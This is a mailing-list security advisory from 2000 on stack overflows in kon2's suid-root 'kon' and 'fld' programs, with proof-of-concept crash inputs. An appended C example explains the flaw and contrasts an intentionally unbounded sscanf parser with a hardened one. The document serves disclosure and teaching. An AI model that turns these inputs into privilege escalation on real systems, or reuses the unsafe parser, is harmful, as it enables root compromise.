Date: Mon, 19 Jun 2000 23:51:53 +0100
From: Chris Evans
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Problems with "kon2" package

Hi,

I had reason to investigate the security of a package called "kon2" - a program for displaying Japanese on the console, I'm led to believe.

SUMMARY
=======

kon2-0.3.9

In the version I briefly examined, there were three suid-root executables:

- kon
- fld
- newvc

Here are details of breakages in "kon" and "fld". I believe both lead to root compromise, although I haven't verified if something has dropped root privileges or not at the time of the overflows.

DEMOS
=====

No discussion of code flaws today, because boring stack overflows are being used.

1) kon

   kon VGA -StartupMessage `perl -e 'print "A"x10000'`

   => segfault with EIP 0x41414141

2) fld

   a) Create file "read.me.and.die", contents:

      CHARSET_REGISTRY"AAAAAAAAAAAAAAAAAAA"
      CHARSET_ENCODING"AAAAAAAAAAAAAAAAAAA"
      CHARSET_ENCODING"AAAAAAAAAAAAAAAAAAA"
      ...

      BUT substitute each sequence of A's with 200 A's.

   b) fld -t bdf read.me.and.die

   I don't get a clean 0x41414141 stack trace, but that's just a minor detail, and these things are always circumventable (I think a pointer gets toasted in between two char[] buffers on the stack).

Cheers
Chris
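Added example, not code from the post above or from kon2: both demos are the same bug class, attacker-controlled bytes (a command-line argument for kon, a quoted keyword value in a BDF font file for fld) copied into a fixed-size stack buffer with no length check. The hypothetical C below parses a CHARSET_REGISTRY line two ways. parse_charset_unsafe() uses an unbounded sscanf conversion, which is the shape of bug that a 200-byte value smashes; parse_charset_safe() measures the quoted value before copying and rejects anything that will not fit. make_demo_line() builds the kind of overlong line the read.me.and.die file uses. VALUE_MAX, the function names and the 200-byte probe are assumptions for illustration; the actual buffer sizes in fld are not given in the post.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Assumed size of the on-stack value buffer in a BDF keyword parser. */
#define VALUE_MAX 64

/* Unsafe pattern. %[^"] carries no field width, so sscanf keeps writing
 * until it sees the closing quote, however far past VALUE_MAX that is.
 * Fed the demo file's 200-byte value this overflows 'out' on the caller's
 * stack; only ever call it with short input. Returns 1 on a parse. */
int parse_charset_unsafe(const char *line, char out[VALUE_MAX])
{
    return sscanf(line, "CHARSET_REGISTRY \"%[^\"]\"", out) == 1 ? 1 : 0;
}

/* Hardened version: locate the quoted value, measure it, and copy only if
 * it fits with room for the terminating NUL.
 * Returns 1 on success, 0 if the line is not a well-formed
 * CHARSET_REGISTRY line, -1 if the value is too long for 'out'. */
int parse_charset_safe(const char *line, char *out, size_t outsz)
{
    static const char kw[] = "CHARSET_REGISTRY";
    const char *p, *end;
    size_t len;

    if (strncmp(line, kw, sizeof kw - 1) != 0)
        return 0;
    p = line + sizeof kw - 1;
    while (*p == ' ' || *p == '\t')   /* BDF puts a space here; the demo may not */
        p++;
    if (*p != '"')
        return 0;
    p++;
    end = strchr(p, '"');
    if (end == NULL)
        return 0;
    len = (size_t)(end - p);
    if (outsz == 0 || len >= outsz)   /* reject instead of truncating silently */
        return -1;
    memcpy(out, p, len);
    out[len] = '\0';
    return 1;
}

/* Constructed input: the keyword followed by a quoted run of n 'A' bytes,
 * like the lines in read.me.and.die. Returns the line length, or -1 if
 * the line would not fit in buf. */
int make_demo_line(char *buf, size_t bufsz, size_t n)
{
    static const char prefix[] = "CHARSET_REGISTRY \"";
    size_t plen = sizeof prefix - 1;
    size_t need = plen + n + 2;       /* closing quote + NUL */

    if (need > bufsz)
        return -1;
    memcpy(buf, prefix, plen);
    memset(buf + plen, 'A', n);
    buf[plen + n] = '"';
    buf[plen + n + 1] = '\0';
    return (int)(plen + n + 1);
}

/* Runs the safe parser on a constructed line whose value is n bytes long.
 * Returns parse_charset_safe()'s result, or -2 if the line could not be built. */
int check_value_of_length(size_t n)
{
    char line[512];
    char out[VALUE_MAX];

    if (make_demo_line(line, sizeof line, n) < 0)
        return -2;
    return parse_charset_safe(line, out, sizeof out);
}

int main(void)
{
    char out[VALUE_MAX];

    parse_charset_safe("CHARSET_REGISTRY \"ISO8859\"", out, sizeof out);
    printf("short value: \"%s\"\n", out);
    printf("63-byte value: %d (1 = accepted)\n", check_value_of_length(63));
    printf("64-byte value: %d (-1 = rejected)\n", check_value_of_length(64));
    printf("200-byte value (the demo): %d (-1 = rejected)\n",
           check_value_of_length(200));
    return 0;
}
```

The unsafe variant "works" on well-formed fonts, which is why bugs like this survive in rarely audited setuid helpers; the fix is to bound the copy at the parser, or at minimum to give the sscanf conversion a width (%63[^"]) and treat a value that fills the buffer as an error rather than as data.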